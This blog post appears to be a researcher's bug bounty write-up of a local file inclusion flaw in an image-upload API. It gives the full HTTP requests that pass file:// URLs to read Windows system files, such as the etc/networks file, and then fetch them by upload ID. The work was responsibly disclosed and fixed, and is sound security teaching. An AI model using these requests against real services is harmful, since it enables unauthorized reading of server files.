Ignoring that fact that I’m less than consistent with my blog posts, you’d think that I’d do a bug bounty write up at some point. I recently reached the top 100 on Bugcrowd and I’ve spent some time on other self managed programs. Well, the time has finally come. I participated in an invite-only program a couple months back, and turned up some fun bugs that were worth sharing. Thank you [redacted] for letting me share these, and hopefully the knowledge will help other bug hunters in their researcher.

This was a nifty local file inclusion bug that I stumbled across. An image upload function allowed the user to provide a URL to the image they would like to upload:

POST /v1/uploads?process={type:%22image%22,%20%22arguments%22:{%22shouldSegment%22:%22true%22}}&url=http://www.hackmenow.com/resources/test.gif HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: [redacted]
Connection: close
Content-Length: 0


I did some digging and found that the process parameter needed some adjusting, or it would just throw errors at me if I didn’t provide a valid image file. After changing the type and arguments with values found in other requests/JS files, I wasn’t restricted to image files.

I spent some time messing around with the url parameter, and I eventually got an interesting error message:

POST /v1/uploads?process={type:%22storeOnly%22,%20%22arguments%22:{%22shouldSegment%22:%22false%22}}&url=file:///127.0.0.1 HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: [redacted]
Connection: close
Content-Length: 0

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/8.5
{
"ExceptionType": "System.Net.WebException",
"Message": "An error has occurred.",
"StackTrace": [redacted],
"InnerException": {
"ExceptionType": "System.Net.WebException",
"Message": "An error has occurred.",
"StackTrace":[redacted],
"InnerException": {
"ExceptionType": "System.IO.FileNotFoundException",
"Message": "An error has occurred.",
"StackTrace": [redacted],
"ExceptionMessage": "Could not find file 'c:\\127.0.0.1'."
},
"ExceptionMessage": "Could not find file 'c:\\127.0.0.1'."
},
"ExceptionMessage": "Could not find file 'c:\\127.0.0.1'."
}

58d

At this point, I know that I can potentially reference local files and that the service is running on Microsoft IIS. So, the next logical step is to load up Intruder and grab a list of Windows files to test out. A few files came up as hits, and shows the following response for each file:

{
"owner": [redacted],
"processingType": "storeOnly",
"uploadedFileName": guidv4,
"uploadId": guidv4,
"availableVariants": "metadata,original",
"originalFileContentType": "application/octet-stream",
"deleteAfterDays": "90",
"sourceUrl": provided filename,
"shouldSegment": "false",
"originalFileSize": provided file size
}

I seems like this indicates that the file was successfully uploaded. From using the application, I know that the upload ID is used to retrieve uploaded files. So, I choose one of the system file paths that appear to have worked and try uploading it again using Repeater.

POST /v1/uploads?process={type:%22storeOnly%22,%20%22arguments%22:{%22shouldSegment%22:%22false%22}}&url=file:///WINDOWS/system32/drivers/etc/networks HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: [redacted]
Connection: close
Content-Length: 0

HTTP/1.1 200 OK
{
"owner": [redacted],
"processingType": "storeOnly",
"uploadedFileName": "5146c2fa-b29f-410a-bd21-e3a383968108.aaf",
"uploadId": "3e48f34b-8e25-4095-860c-37362c903fe8~110",
"availableVariants": "metadata,original",
"originalFileContentType": "application/octet-stream",
"deleteAfterDays": "90",
"sourceUrl": "file:///WINDOWS/system32/drivers/etc/networks",
"shouldSegment": "false",
"originalFileSize": "407"
}

Looks good. Last thing to do is try to retrieve the upload ID:

GET /v1/uploads/3e48f34b-8e25-4095-860c-37362c903fe8~110 HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Connection: close

lfi

588

The bug was accepted as a P1 vulnerability and promptly resolved by the team.

I hope you enjoyed this write up, I plan on trying to do a few more of these in the future.

Thanks for reading!

Advertisements

About Jean Fleury

Naval officer, privateer, cyber security professional. Traded in my five-ship squadron for a computer and Burp Suite license.

Category

Security Research, Web Application Penetration Testing